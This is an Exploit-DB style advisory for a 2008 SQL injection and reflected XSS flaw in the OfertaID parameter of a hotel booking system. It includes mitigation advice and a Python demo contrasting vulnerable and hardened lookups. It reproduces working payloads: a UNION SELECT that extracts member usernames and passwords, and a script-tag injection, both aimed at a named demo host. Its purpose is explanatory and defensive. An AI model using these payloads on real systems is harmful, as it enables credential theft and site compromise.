Vendor: Booking System for Hotels Group
By: d3b4g
CVSS: 7.5 (HIGH)
Vulnerability type: XSS/SQL Injection
CWE: 89
Product Name: Booking System for Hotels Group
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Booking System for Hotels Group powered by Venalsur Bookingcenter XSS/SQL injection vulnerability

The script cadena_ofertas_ext.php in Booking System for Hotels Group, powered by Venalsur Bookingcenter, passes the OfertaID query parameter into a SQL query without validating it or binding it as a parameter, and reflects the same value back into the page without HTML encoding. An attacker can therefore inject SQL through the URL http://site.com/www_en/cadena_ofertas_ext.php?OfertaID=[sql] (the published demo uses a UNION SELECT with eleven columns to read username and password from a members table), or inject script through reflected XSS, for example http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=<script>alert(40323.6285846991)</script>. No patch is known to exist.

Mitigation:

Treat OfertaID as what it is, an integer identifier: reject any value that is not a plain integer before it reaches the database, and pass it to the query as a bound parameter (prepared statement) rather than concatenating it into the SQL string. Wherever the value is echoed back into the page, encode it for HTML (htmlspecialchars() in PHP) so that script tags are rendered as text. Escaping quotes alone is not sufficient: the UNION payload above contains no quote characters, so magic_quotes-style filtering does not stop it, and the XSS payload only needs angle brackets.
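The following is an added example, not code from the Bookingcenter product or from the advisory's author. It reproduces both halves of the finding against a constructed SQLite database: the OfertaID value is taken from the demo URLs exactly as published, the vulnerable lookup concatenates it into SQL the way the advisory implies, and the hardened lookup validates and binds it. The table names and the eleven-column offers row follow the payload; the schema, the sample rows, the trailing ORDER BY clause (standing in for whatever the real query appends after the parameter, which is why the payload ends in /*) and the concat() registration (MySQL has it built in, SQLite does not) are assumptions for the demo.

```python
import html
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed schema and rows; only the table/column names come from the advisory payload.
SCHEMA = """
CREATE TABLE ofertas (
    OfertaID INTEGER, titulo TEXT, c3 TEXT, c4 TEXT, c5 TEXT, c6 TEXT,
    c7 TEXT, c8 TEXT, c9 TEXT, c10 TEXT, c11 TEXT
);
CREATE TABLE members (username TEXT, password TEXT);
INSERT INTO ofertas VALUES (7, 'Weekend offer', '', '', '', '', '', '', '', '', '');
INSERT INTO members VALUES ('admin', 's3cret');
"""

# Demo URLs exactly as published in the advisory.
DEMO_URL = ("http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID="
            "-1+union+all+select+1,2,3,concat(username,password),5,6,7,8,9,10,11+from+members/*")
XSS_URL = ("http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID="
           "<script>alert(40323.6285846991)</script>")


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    # MySQL has concat(); register an equivalent so the published payload runs on SQLite.
    conn.create_function("concat", -1, lambda *args: "".join(str(a) for a in args))
    return conn


def oferta_id_from(url):
    """Extract the OfertaID query parameter, decoding '+' to space as PHP does."""
    return parse_qs(urlsplit(url).query)["OfertaID"][0]


def lookup_vulnerable(conn, oferta_id):
    # String concatenation of an unvalidated parameter: the bug class in the advisory.
    # The ORDER BY is an assumed trailing clause; the payload's '/*' comments it out.
    sql = f"SELECT * FROM ofertas WHERE OfertaID = {oferta_id} ORDER BY OfertaID"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, oferta_id):
    # OfertaID is an integer identifier: refuse anything else before it reaches SQL,
    # then bind the value instead of interpolating it.
    ident = int(oferta_id)  # raises ValueError for any injection string
    return conn.execute("SELECT * FROM ofertas WHERE OfertaID = ?", (ident,)).fetchall()


def render_vulnerable(oferta_id):
    # Reflecting the raw parameter into HTML is the reflected-XSS half of the advisory.
    return f"<h1>Offer {oferta_id}</h1>"


def render_safe(oferta_id):
    # HTML-encode on output so a script tag is displayed as text, not executed.
    return f"<h1>Offer {html.escape(oferta_id, quote=True)}</h1>"


if __name__ == "__main__":
    conn = open_db()
    payload = oferta_id_from(DEMO_URL)
    print(lookup_vulnerable(conn, payload))   # column 4 carries 'admins3cret'
    try:
        lookup_safe(conn, payload)
    except ValueError as err:
        print("rejected:", err)
    print(render_vulnerable(oferta_id_from(XSS_URL)))
    print(render_safe(oferta_id_from(XSS_URL)))
```

Running it shows the UNION row with the concatenated credentials coming back from the vulnerable lookup, the same value rejected by the hardened lookup before any SQL executes, and the script tag neutralised by output encoding. The integer check matters more than the binding for this particular parameter: a bound string would simply match nothing, but rejecting it up front also keeps the bad value out of logs and error pages.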
Source

Exploit-DB raw data:

Booking System for Hotels Group powered by Venalsur Bookingcenter XSS/SQL injection vulnerability!
------------------------------------------------------------------------------------------------------
Author:   d3b4g

Greetz:   str0ke, Darkc0de.com, rez0rn, draconyx, godinlaw, hatebreeder and all my friends
Site   :  www.bl4ck3nd.info
Contact:  bl4ckend[at]gmail[dot]com
-------------------------------------------------------------------


-------------------------------------------------------------------
Dork:         N/A
-------------------------------------------------------------------
Affected software:

-----------------
Application : Booking System for Hotels Group powered by Venalsur Bookingcenter
URL :  http://www.bookingcentre.eu
===================================================================

Sql injection
=============


Exploit: http://site.com/www_en/cadena_ofertas_ext.php?OfertaID= [sql]

Demo   : http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=-1+union+all+select+1,2,3,concat(username,password),5,6,7,8,9,10,11+from+members/*

------------------------------------------------------------------------

Xss
===

Exploit: http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=<script>alert(40323.6285846991)</script>

=========================================================================

Proud to be a Maldivian :):) Happy new Maldives [29.10.2008]

# milw0rm.com [2008-10-29]